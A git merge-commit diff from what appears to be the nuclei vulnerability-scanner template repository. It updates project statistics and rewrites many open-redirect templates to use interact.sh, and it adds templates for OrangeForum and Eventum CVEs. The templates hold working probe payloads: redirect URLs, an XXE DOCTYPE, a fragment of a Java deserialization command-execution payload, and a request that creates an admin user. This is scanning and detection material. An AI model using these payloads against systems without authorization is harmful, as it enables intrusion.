Merge branch 'projectdiscovery:master' into dashboard
commit
8ad6525611
|
@ -1,13 +1,13 @@
|
||||||
cves/2021/CVE-2021-20137.yaml
|
cves/2018/CVE-2018-14474.yaml
|
||||||
cves/2021/CVE-2021-24245.yaml
|
cves/2018/CVE-2018-16761.yaml
|
||||||
cves/2021/CVE-2021-27519.yaml
|
cves/2020/CVE-2020-29597.yaml
|
||||||
exposed-panels/gryphon-login.yaml
|
cves/2021/CVE-2021-27748.yaml
|
||||||
exposed-panels/zyxel/zyxel-firewall-panel.yaml
|
cves/2022/CVE-2022-29383.yaml
|
||||||
file/audit/cisco/configure-aaa-service.yaml
|
cves/2022/CVE-2022-31268.yaml
|
||||||
file/audit/cisco/configure-service-timestamps-debug.yaml
|
exposed-panels/eventum-panel.yaml
|
||||||
file/audit/cisco/configure-service-timestamps-logmessages.yaml
|
exposures/files/appsettings-file-disclosure.yaml
|
||||||
file/audit/cisco/disable-ip-source-route.yaml
|
exposures/files/django-secret-key.yaml
|
||||||
file/audit/cisco/disable-pad-service.yaml
|
exposures/files/ftpconfig.yaml
|
||||||
file/audit/cisco/enable-secret-for-password-user-and-.yaml
|
exposures/files/git-mailmap.yaml
|
||||||
file/audit/cisco/logging-enable.yaml
|
exposures/files/php-ini.yaml
|
||||||
file/audit/cisco/set-and-secure-passwords.yaml
|
vulnerabilities/other/phpok-sqli.yaml
|
||||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 |
|
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
|
||||||
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 |
|
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
|
||||||
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 |
|
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
|
||||||
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 |
|
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
|
||||||
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | |
|
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
|
||||||
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||||
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | |
|
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
|
||||||
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | |
|
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
|
||||||
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | |
|
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
|
||||||
| tech | 274 | pussycat0x | 116 | file | 68 | | | | |
|
| tech | 274 | gy741 | 122 | file | 76 | | | | |
|
||||||
|
|
||||||
**264 directories, 3622 files**.
|
**265 directories, 3636 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
3103
TEMPLATES-STATS.md
3103
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 |
|
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
|
||||||
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 |
|
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
|
||||||
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 |
|
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
|
||||||
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 |
|
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
|
||||||
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | |
|
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
|
||||||
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||||
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | |
|
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
|
||||||
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | |
|
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
|
||||||
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | |
|
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
|
||||||
| tech | 274 | pussycat0x | 116 | file | 68 | | | | |
|
| tech | 274 | gy741 | 122 | file | 76 | | | | |
|
||||||
|
|
|
@ -9,6 +9,16 @@
|
||||||
"email": ""
|
"email": ""
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"author": "Dhiyaneshwaran",
|
||||||
|
"links": {
|
||||||
|
"github": "https://github.com/DhiyaneshGeek",
|
||||||
|
"twitter": "https://twitter.com/DhiyaneshDK",
|
||||||
|
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
|
||||||
|
"website": "https://dhiyaneshgeek.github.io/",
|
||||||
|
"email": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
{
|
{
|
||||||
"author": "duty_1g",
|
"author": "duty_1g",
|
||||||
"links": {
|
"links": {
|
||||||
|
|
|
@ -19,13 +19,13 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
|
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
|
||||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
|
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/13
|
# Enhanced by mp on 2022/02/13
|
||||||
|
|
|
@ -18,12 +18,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
|
- "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/21
|
# Enhanced by mp on 2022/02/21
|
||||||
|
|
|
@ -19,12 +19,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
|
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/25
|
# Enhanced by mp on 2022/02/25
|
||||||
|
|
|
@ -20,10 +20,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com'
|
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -17,10 +17,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
|
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -16,10 +16,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
|
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -20,10 +20,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
- '{{BaseURL}}/login?redir=http://www.interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -42,7 +42,7 @@ requests:
|
||||||
<string>-c</string>
|
<string>-c</string>
|
||||||
</void>
|
</void>
|
||||||
<void index="2">
|
<void index="2">
|
||||||
<string>example.com</string>
|
<string>interact.sh</string>
|
||||||
</void>
|
</void>
|
||||||
</array>
|
</array>
|
||||||
<void method="start"/></void>
|
<void method="start"/></void>
|
||||||
|
|
|
@ -26,7 +26,7 @@ requests:
|
||||||
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
|
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
|
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
@ -34,4 +34,4 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -20,12 +20,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
|
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- 'noresize src="/\example.com?configName='
|
- 'noresize src="/\interact.sh?configName='
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/14
|
# Enhanced by mp on 2022/04/14
|
||||||
|
|
|
@ -19,12 +19,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}//example.com"
|
- "{{BaseURL}}//interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
|
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/26
|
# Enhanced by mp on 2022/04/26
|
||||||
|
|
|
@ -19,10 +19,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
|
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -23,10 +23,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com'
|
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">'
|
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2018-14474
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OrangeForum 1.4.0 - Open Redirect
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
|
||||||
|
reference:
|
||||||
|
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
|
||||||
|
- https://seclists.org/fulldisclosure/2019/Jan/32
|
||||||
|
- https://vuldb.com/?id.122045
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2018-14474
|
||||||
|
cwe-id: CWE-601
|
||||||
|
tags: cve,cve2018,redirect,orangeforum,oss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
|
||||||
|
- '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -22,7 +22,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}//www.example.com"
|
- "{{BaseURL}}//www.interact.sh"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -31,6 +31,6 @@ requests:
|
||||||
- 301
|
- 301
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Location: https://www.example.com"
|
- "Location: https://www.interact.sh"
|
||||||
- "Location: http://www.example.com"
|
- "Location: http://www.interact.sh"
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -19,12 +19,12 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
|
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/26
|
# Enhanced by mp on 2022/04/26
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2018-16761
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Eventum v3.3.4 - Open Redirect
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Eventum before 3.4.0 has an open redirect vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
|
||||||
|
- https://github.com/eventum/eventum/
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2018-16761/
|
||||||
|
- https://github.com/eventum/eventum/releases/tag/v3.4.0
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2018-16761
|
||||||
|
cwe-id: CWE-601
|
||||||
|
tags: cve,cve2018,redirect,eventum,oss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/select_project.php?url=http://interact.sh'
|
||||||
|
- '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -22,8 +22,8 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com'
|
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com'
|
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -32,7 +32,7 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "self.location = 'http://www.example.com'"
|
- "self.location = 'http://www.interact.sh'"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -20,7 +20,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
|
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
|
||||||
|
|
||||||
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com">
|
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -21,8 +21,8 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/redirector.php?url=https://attacker.com'
|
- '{{BaseURL}}/redirector.php?url=https://interact.sh'
|
||||||
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com'
|
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -30,7 +30,7 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<meta http-equiv="refresh" content="0; URL=https://attacker.com">'
|
- '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -19,10 +19,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
|
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -25,10 +25,10 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
body: |
|
body: |
|
||||||
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
|
success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
|
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
|
|
@ -25,7 +25,7 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
body: |
|
||||||
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
|
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -20,10 +20,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
|
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -20,10 +20,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/updating.jsp?url=https://example.com/"
|
- "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -21,13 +21,13 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/index.php?redirect=/\/evil.com/'
|
- '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
|
||||||
